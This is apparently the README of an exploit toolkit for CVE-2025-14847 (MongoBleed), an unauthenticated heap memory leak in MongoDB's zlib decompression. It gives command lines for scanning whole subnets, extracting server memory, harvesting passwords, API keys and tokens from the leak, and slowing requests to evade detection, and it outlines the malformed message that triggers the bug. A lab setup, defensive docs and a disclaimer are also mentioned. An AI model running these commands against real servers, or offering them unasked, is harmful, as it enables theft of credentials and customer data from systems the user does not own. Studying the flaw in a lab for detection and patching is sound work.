Share
## https://sploitus.com/exploit?id=871BCC5A-748C-5506-8347-2C2F15C1CCED
# MongoBleed
**CVE-2025-14847 Scanner and Exploitation Toolkit**
A security research toolkit for MongoBleed -- a critical unauthenticated memory leak in MongoDB's zlib decompression that allows attackers to extract sensitive data from server heap memory without authentication.
```
โโฆโโโโโโโโโโโโโโโ โฌ โโโโโโโโฌโ
โโโโ โโโโโ โฌโ โโ โฉโโ โโค โโค โโ
โฉ โฉโโโโโโโโโโโโโโโโดโโโโโโโโโโดโ
CVE-2025-14847 Scanner & Exploit
```
## Quick Start
```bash
# No external dependencies -- Python 3 standard library only
cd cli
# Detect if a target is vulnerable (default action)
python mongobleed.py -t localhost:27017
# Scan an entire subnet
python mongobleed.py -t 192.168.1.0/24
# Extract memory and parse for credentials
python mongobleed.py -t target:27017 -e --credentials
# Safe mode -- detection only, no exploitation
python mongobleed.py -t target:27017 -s
```
## Repository Structure
```
MongoBleed/
โโโ cli/ # Command-line scanner and exploitation tool
โ โโโ mongobleed.py # Main CLI tool
โ โโโ requirements.txt # Python dependencies (stdlib only)
โ โโโ README.md # CLI documentation
โโโ lab/ # Docker-based CTF lab environment
โ โโโ docker-compose.yml # Multi-container lab setup
โ โโโ vulnerable/ # Vulnerable MongoDB configurations
โ โโโ patched/ # Patched MongoDB for comparison
โ โโโ no-zlib/ # Non-exploitable (zlib disabled)
โ โโโ monitoring/ # Attack visualization dashboard
โ โโโ warmup-heap.sh # Populate heap with sensitive data
โ โโโ README.md # Lab setup instructions
โโโ nuclei/ # Nuclei scanning templates
โ โโโ CVE-2025-14847.yaml # Active exploitation template
โ โโโ CVE-2025-14847-safe.yaml # Safe detection template
โ โโโ README.md # Nuclei template docs
โโโ docs/ # Educational documentation
โ โโโ README.md # Learning path index
โ โโโ 01-fundamentals.md # MongoDB & memory basics
โ โโโ 02-vulnerability.md # CVE-2025-14847 deep dive
โ โโโ 03-exploitation.md # Hands-on exploitation
โ โโโ 04-detection.md # Hunting and detection
โ โโโ 05-defense.md # Mitigation strategies
โโโ README.md # This file
```
## Features
### CLI Tool
- Version fingerprinting and compression detection (zlib/snappy/zstd)
- Vulnerability detection with safe mode option
- Memory extraction via offset scanning (configurable range)
- Credential pattern detection (16 patterns: passwords, API keys, JWTs, AWS keys, MongoDB URIs, etc.)
- CIDR notation support (`192.168.1.0/24`, `10.0.0.0/16:27018`)
- Batch scanning from target files with multi-threading
- Continuous extraction mode
- Hexdump and printable string extraction
- JSON output and file export
- Evasion controls (delay, jitter)
- Colored terminal output
### Lab Environment
- Multiple vulnerable MongoDB versions (4.4.29, 6.0.26, 8.0.16)
- Patched version for comparison (8.0.17)
- No-zlib version demonstrating mitigation
- Pre-seeded with realistic sensitive data
- CTF-style flags for learning
- Monitoring dashboard with attack visualization
- Heap warmup script for reliable exploitation demos
### Nuclei Templates
- Safe detection template (version + compression check only)
- Active exploitation template (version + zlib confirmation)
## Usage
### Detection
```bash
# Check single target
python mongobleed.py -t localhost:27017
# Check with verbose output
python mongobleed.py -t localhost:27017 -v
# Safe mode -- detection only, never sends exploit payload
python mongobleed.py -t localhost:27017 -s
# Show version info
python mongobleed.py -t localhost:27017 --version
```
### Network Scanning
```bash
# Scan a /24 subnet
python mongobleed.py -t 192.168.1.0/24
# CIDR with custom port
python mongobleed.py -t 10.0.0.0/24:27018
# Scan from target file (CIDR ranges in file are expanded)
python mongobleed.py -T targets.txt -j 20 -o results.json
# Target file can contain IPs, host:port, and CIDR ranges
cat targets.txt
# 192.168.1.100:27017
# 10.0.0.0/24
# mongodb.internal:27017
```
### Memory Extraction
```bash
# Extract memory (default offset range 20-8192)
python mongobleed.py -t target:27017 -e
# Custom offset range
python mongobleed.py -t target:27017 -e --min-offset 20 --max-offset 500
# Continuous extraction (Ctrl+C to stop)
python mongobleed.py -t target:27017 --continuous
# Force extraction even if version check is inconclusive
python mongobleed.py -t target:27017 -e --force
```
### Analysis
```bash
# Parse leaked memory for credentials and secrets
python mongobleed.py -t target:27017 -e --credentials
# Parse for tokens specifically
python mongobleed.py -t target:27017 -e --tokens
# Extract printable strings
python mongobleed.py -t target:27017 -e --strings
# Hexdump output
python mongobleed.py -t target:27017 -e --hexdump
```
### Evasion
```bash
# Add delay between requests (milliseconds)
python mongobleed.py -t target:27017 -e --delay 500
# Random jitter on delay
python mongobleed.py -t target:27017 -e --delay 1000 --jitter
```
### Nuclei Templates
```bash
# Safe detection only
nuclei -t nuclei/CVE-2025-14847-safe.yaml -u mongodb://localhost:27017
# Active detection
nuclei -t nuclei/CVE-2025-14847.yaml -u mongodb://localhost:27017
# Scan multiple targets
nuclei -t nuclei/ -l targets.txt
```
### Lab Environment
```bash
# Start all containers
cd lab && docker compose up -d
# Services:
# - localhost:27017 MongoDB 4.4.29 (Vulnerable + zlib)
# - localhost:27018 MongoDB 6.0.26 (Vulnerable + zlib)
# - localhost:27019 MongoDB 8.0.16 (Vulnerable + zlib)
# - localhost:27020 MongoDB 8.0.17 (Patched)
# - localhost:27021 MongoDB 8.0.16 (No zlib - not exploitable)
# - localhost:8080 Monitoring Dashboard
# Warm up heap with sensitive data before exploitation
./warmup-heap.sh 27017 50
# Run exploit against lab
cd ../cli
python mongobleed.py -t localhost:27017 -e --credentials
```
## CLI Options
```
Target:
-t, --target TARGET Target host:port or CIDR range (e.g. 192.168.1.0/24)
-T, --targets FILE File with target list (supports CIDR per line)
Detection:
--detect Detect if target is vulnerable (default action)
--version Show MongoDB version
-s, --safe Safe mode - detection only, no exploitation
Exploitation:
-e, --extract Extract memory via offset scanning
--min-offset N Minimum offset to probe (default: 20)
--max-offset N Maximum offset to probe (default: 8192)
--continuous Continuous extraction mode
--force Force extraction even if version check fails
Analysis:
--credentials Parse for credentials
--tokens Parse for tokens
--strings Extract printable strings
--hexdump Display hexdump
Evasion:
--delay MS Delay between requests (milliseconds)
--jitter Random delay jitter
Output:
-o, --output FILE Output file (JSON)
-v, --verbose Verbose output
-q, --quiet Quiet mode
--json JSON output
--no-color Disable colors
Connection:
--timeout SECS Connection timeout (default: 10)
-j, --threads N Threads for batch scanning (default: 10)
```
## Credential Detection Patterns
The tool searches extracted memory for the following patterns:
| Type | Example Pattern |
|------|----------------|
| password | `password: value`, `passwd=value` |
| secret | `secret: value` |
| api_key | `api_key: sk_live_...` |
| token | `token: ...` (16+ chars) |
| bearer_token | `Bearer eyJ...` |
| jwt | `eyJ...` (Base64 JWT) |
| mongodb_uri | `mongodb://user:pass@host` |
| postgres_uri | `postgresql://...` |
| redis_uri | `redis://...` |
| stripe_key | `sk_live_...` |
| openai_key | `sk-...` (48+ chars) |
| aws_access_key | `AKIA...` |
| github_token | `ghp_...` |
| slack_token | `xoxb-...`, `xoxp-...` |
| ctf_flag | `FLAG{...}` |
## CVE-2025-14847 Details
| Item | Value |
|------|-------|
| **CVE** | CVE-2025-14847 |
| **Name** | MongoBleed |
| **CWE** | CWE-130 (Improper Handling of Length Parameter) |
| **CVSS** | 8.7 (High) |
| **Type** | Unauthenticated Memory Leak |
| **Disclosed** | December 19, 2025 |
| **Exploited ITW** | December 29, 2025 |
### Affected Versions
| Branch | Vulnerable | Patched |
|--------|------------|---------|
| 8.2.x | 8.2.0 - 8.2.2 | 8.2.3 |
| 8.0.x | 8.0.0 - 8.0.16 | 8.0.17 |
| 7.0.x | 7.0.0 - 7.0.27 | 7.0.28 |
| 6.0.x | 6.0.0 - 6.0.26 | 6.0.27 |
| 5.0.x | 5.0.0 - 5.0.31 | 5.0.32 |
| 4.4.x | 4.4.0 - 4.4.29 | 4.4.30 |
| 4.2.x | All versions | EOL - No patch |
| 4.0.x | All versions | EOL - No patch |
| 3.6.x | All versions | EOL - No patch |
### How It Works
MongoBleed exploits a flaw in MongoDB's zlib message decompression (`message_compressor_zlib.cpp`). The vulnerable code returns the allocated buffer size instead of the actual decompressed length, allowing attackers to read uninitialized heap memory.
```
1. CONNECT (no authentication required)
โ
2. SEND MALFORMED OP_COMPRESSED
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ originalOpcode: OP_MSG (2013) โ
โ uncompressedSize: INFLATED โ โ Bug trigger
โ compressorId: zlib (2) โ
โ compressedMessage: [small data] โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
3. SERVER ALLOCATES OVERSIZED BUFFER
[ small real data | uninitialized heap memory ]
โ
4. BSON PARSER READS INTO HEAP GARBAGE
Inflated document length causes parser to read
beyond actual data into heap memory
โ
5. ERROR RESPONSE LEAKS MEMORY
"invalid BSON field name 'password=secret123...'"
```
### What Can Be Leaked
- Database credentials and passwords
- API keys and tokens
- Session tokens and JWTs
- MongoDB connection strings
- Application secrets from memory
- Customer PII from recent queries
- Internal configuration data
## Credits
- **Joe Desimone** (Elastic Security) - Original PoC and vulnerability naming
- **MongoDB Security Team** - Patch development
- **Wiz Research** - In-the-wild exploitation analysis
- **Eric Capuano** - Detection signatures and Velociraptor artifact
## References
- [MongoDB Security Advisory](https://www.mongodb.com/docs/manual/release-notes/)
- [Wiz Blog - MongoBleed Analysis](https://www.wiz.io/blog/mongobleed-cve-2025-14847-exploited-in-the-wild-mongodb)
- [Hunting MongoBleed - Eric Capuano](https://blog.ecapuano.com/p/hunting-mongobleed-cve-2025-14847)
- [Original PoC - joe-desimone/mongobleed](https://github.com/joe-desimone/mongobleed)
- [NVD - CVE-2025-14847](https://nvd.nist.gov/vuln/detail/CVE-2025-14847)
## Disclaimer
This toolkit is provided for **authorized security testing, research, and educational purposes only**. Only use against systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
## License
MIT License